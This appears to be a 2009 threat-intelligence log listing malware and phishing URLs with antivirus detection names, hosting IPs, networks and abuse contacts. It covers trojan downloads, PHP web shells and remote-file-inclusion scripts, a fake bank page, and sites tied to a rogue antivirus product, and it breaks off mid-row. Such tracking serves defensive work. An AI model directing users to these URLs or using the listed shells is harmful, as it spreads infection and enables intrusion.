| 2009-07-21 13:24:55 | undef | unknown_html | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/kiprock/suck/login.php |
| 2009-07-21 13:24:55 | undef | unknown_html | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/kiprock/suck/login.php? |
| 2009-07-21 13:24:55 | undef | unknown_html | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/kl1ku/index.php |
| 2009-07-21 13:24:55 | avira | TR/Agent.uckr | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/kl3zero/imuhgetyou.exe |
| 2009-07-21 13:24:55 | undef | unknown_html | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/krazyman/login.php |
| 2009-07-21 13:24:55 | undef | unknown_html | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/LaTinBoy/gunbound |
| 2009-07-21 13:24:54 | avira | TR/Dropper.Gen | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/khaled1234/TASKMAN_DT.exe |
| 2009-07-21 13:24:53 | undef | unknown_html | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/keane/login.php |
| 2009-07-21 13:24:52 | avira | TR/Dropper.Gen | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/justblaze05/sever.exe |
| 2009-07-21 13:24:52 | avira | DR/bvb.SAG | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/kaled2000/server.exe |
| 2009-07-21 13:24:50 | avira | WORM/IrcBot.jvw | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/hinda/hotsexy.exe |
| 2009-07-21 13:24:50 | avira | TR/Crypt.ZPACK.Gen | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/hkayne10/trance%20music.exe |
| 2009-07-21 13:24:50 | avira | TR/Dropper.Gen | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/hzman/lolo.exe.lolo |
| 2009-07-21 13:24:50 | undef | unknown_html | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/iinsert/index.php?link=http://&size |
| 2009-07-21 13:24:50 | undef | unknown_html | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/isengbu/ |
| 2009-07-21 13:24:49 | undef | unknown_html | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/FreeStuff/Rapidshare/Verify.html |
| 2009-07-21 13:24:49 | undef | unknown_html | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/friendters/tas/ |
| 2009-07-21 13:24:49 | undef | unknown_html | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/friendters/tas/? |
| 2009-07-21 13:24:49 | undef | unknown_html | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/Gametimegenerator/ |
| 2009-07-21 13:24:49 | avira | BDS/Bifrose.aqib | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/glg/Network-Dmar.exe |
| 2009-07-21 13:24:49 | undef | unknown_html | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/Grokers |
| 2009-07-21 13:24:49 | undef | unknown_html | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/Grokers/ |
| 2009-07-21 13:24:49 | avira | TR/Dropper.Gen | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/Haamas/server.exe |
| 2009-07-21 13:24:49 | undef | unknown_html | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/hackerbpp/Login/login-next.html |
| 2009-07-21 13:24:49 | undef | unknown_html | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/hackerbpp/Login/login-next.html? |
| 2009-07-21 13:24:49 | avira | HTML/Infected.WebPage.Gen | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/halifaxinternetbanki/mybank(1)(1).alliance-leicester.co.uk.htm |
| 2009-07-21 13:24:49 | avira | TR/Dldr.Tiny.CA | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/haneene/server.com |
| 2009-07-21 13:24:49 | undef | unknown_html | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/hayes/login.html |
| 2009-07-21 13:24:48 | undef | unknown_html | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/DeviLTakumi/login.php |
| 2009-07-21 13:24:48 | avira | TR/Agent.uckr | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/dickybob2525/system.exe |
| 2009-07-21 13:24:48 | avira | DR/Delphi.Gen | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/dickybob2525/web/120.exe |
| 2009-07-21 13:24:48 | undef | unknown_html | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/doger/Login.html |
-
sites related to the XP Deluxe Protector rogue
http://antispy2009.net/onlinescan/index.php -> fake scanner page
http://antispy2009.net/setup.exe -> Rogue downloader
http://downloadsoftwareserver3.com/gdi32lib.dll
http://downloadsoftwareserver3.com/xpdeluxe.exe
xp-deluxeprotector.com - homepage
-
http://scanriteweb.com/hitin.php?land=98&affid=16100
http://scanriteweb.com/download.php?affid=16100
http://securityscanavailable.com/hitin.php?land=20&affid=20100
http://securityscanavailable.com/download.php?affid=20100
http://exereload.com/onlinemovies.1.48040.exe
-
21/22/23 Jul new malware
+----------------------+---------+--------------------------------+-----------------+--------------------------------+---------+--------+---------------------------+--------------------------------------------------------------------------------------------------+
| from_unixtime(first) | scanner | virusname | review | email | country | source | netname | url |
+----------------------+---------+--------------------------------+-----------------+--------------------------------+---------+--------+---------------------------+--------------------------------------------------------------------------------------------------+
| 2009-07-23 18:01:43 | undef | unknown_onlinemovies.45017.exe | 95.211.8.20 | abuse@leaseweb.com | NL | RIPE | NL-LEASEWEB-20080724 | http://load-exe-world.com/onlinemovies.45017.exe |
| 2009-07-23 18:01:34 | undef | unknown_ArchosInstaller.exe | 83.167.45.32 | abuse@neotelecoms.com | FR | RIPE | PLANETSERVICE-1-NEOT | http://www.archos.com/plugins/_gen5/NDLX6X46TNL9UW/cinema_plugin_a605_install.exe |
| 2009-07-23 18:01:34 | undef | unknown_ArchosInstaller.exe | 83.167.45.32 | abuse@neotelecoms.com | FR | RIPE | PLANETSERVICE-1-NEOT | http://www.archos.com/plugins/_gen5/NDLX6X46TNL9UW/iradio_plugin_a605_install.exe |
| 2009-07-23 18:01:34 | undef | unknown_ArchosInstaller.exe | 83.167.45.32 | abuse@neotelecoms.com | FR | RIPE | PLANETSERVICE-1-NEOT | http://www.archos.com/plugins/_gen5/NDLX6X46TNL9UW/videopodcast_plugin_a605_install.exe |
| 2009-07-23 18:01:33 | undef | unknown_ArchosInstaller.exe | 83.167.45.32 | abuse@neotelecoms.com | FR | RIPE | PLANETSERVICE-1-NEOT | http://www.archos.com/plugins/_gen5/NDLX6X46TNL9UW/webbrowser_plugin_a605_install.exe |
| 2009-07-23 17:00:20 | avira | PHP/BackDoor.E | 202.157.150.105 | indra@webvisions.com | SG | APNIC | WEBVISIONS-SERVER | http://www.fusionc.com/_private/id.jpg |
| 2009-07-23 16:43:45 | avira | EXP/PHP.E | 64.235.57.20 | noc@premianet.com | US | ARIN | APH-LAS-NV1 | http://www.virtualhost.com.mx/xeonbox/xpl/list |
| 2009-07-23 16:18:57 | avira | TR/PHP.PHPInfo.D | 211.202.2.220 | abuse@hanaro.com | KR | APNIC | HANANET | http://dwno.or.kr/bbs/data/swat/v6.txt |
| 2009-07-23 16:18:30 | clamav | PHP.Shell-11 | 58.86.38.41 | maxchang@kbtelecom.net | TW | APNIC | KBT-NET | http://18-kk.com/bot/pbot.txt |
| 2009-07-23 16:13:56 | avira | PHP/Pbot.A.6 | 213.195.69.64 | abuse@ibercom.com | ES | RIPE | IBERCOMNET | http://www.etxeonenak.com/archivos/alisei.txt |
| 2009-07-23 16:03:18 | undef | unknown_html_RFI_php | 213.155.31.144 | kackad@list.ru | UA | RIPE | skylog | http://skylog.kz/5c464da2bb6908cbd39dacdd4f42bac9/id1.txt |
| 2009-07-23 15:34:50 | clamav | PHP.ShellExec | 98.137.46.72 | network-abuse@cc.yahoo-inc.com | US | ARIN | A-YAHOO-US9 | http://www.geocities.com/andika.arganata/ping/mildnet.txt |
| 2009-07-23 15:34:06 | avira | PHP/Pbot.A.6 | 78.129.205.31 | abuse_rs@altervista.it | IT | RIPE | AlterVista_1 | http://idididid.altervista.org/dark.txt |
| 2009-07-23 15:23:29 | undef | unknown_html_RFI_php | 211.202.2.220 | abuse@hanaro.com | KR | APNIC | HANANET | http://dwno.or.kr/bbs/data/swat/tes.txt |
| 2009-07-23 15:14:41 | undef | unknown_html_RFI_php | 208.109.14.78 | abuse@godaddy.com | US | ARIN | GO-DADDY-SOFTWARE-INC | http://www.net-www.info/rotaryxativa/modules/z1 |
| 2009-07-23 15:08:50 | undef | unknown_html_RFI_php | 211.47.128.229 | abuse@sknetworks.co.kr | KR | APNIC | KRNIC-KR | http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt |
| 2009-07-23 15:02:04 | undef | unknown_html_RFI_php | 67.217.53.31 | hdnoc@hostdepartment.com | US | ARIN | WORLD-ISP-NETWORK | http://route1eventservices.com/coppermine/include/fx29id.txt |
| 2009-07-23 14:54:30 | undef | unknown_html_RFI_php | 132.198.48.12 | abuse@uvm.edu | US | ARIN | UVM-NET | http://esf.uvm.edu/rmsp/skins/myskin/css/id1.txt |
| 2009-07-23 14:54:22 | avira | PHP/Info.A | 132.198.48.12 | abuse@uvm.edu | US | ARIN | UVM-NET | http://esf.uvm.edu/rmsp/skins/myskin/css/idd.txt |
| 2009-07-23 14:22:51 | clamav | PHP.Downloader-4 | 110.45.138.139 | support@kidc.net | KR | APNIC | KIDC | http://www.shinsungbuk.com/BOARD/skin/ggambo7002_gallery/vti/spread.txt |
| 2009-07-23 14:18:17 | avira | PHP/BackDoor.AR | 58.230.118.105 | abuse@hanaro.com | KR | APNIC | HANANET | http://shalomchair.com/fx29id2.txt |
| 2009-07-23 14:07:08 | avira | PHP/C99Shell.C | 65.247.182.200 | abuse-mail@verizonbusiness.com | US | ARIN | UUNET65-2 | http://65.247.182.200/r |
| 2009-07-23 14:05:28 | avira | SPR/PHP.ID | 59.4.104.174 | abuse@kornet.net | KR | APNIC | KORNET | http://80.mipyeong.or.kr/fr.txt |
| 2009-07-23 14:04:38 | avira | SPR/PHP.ID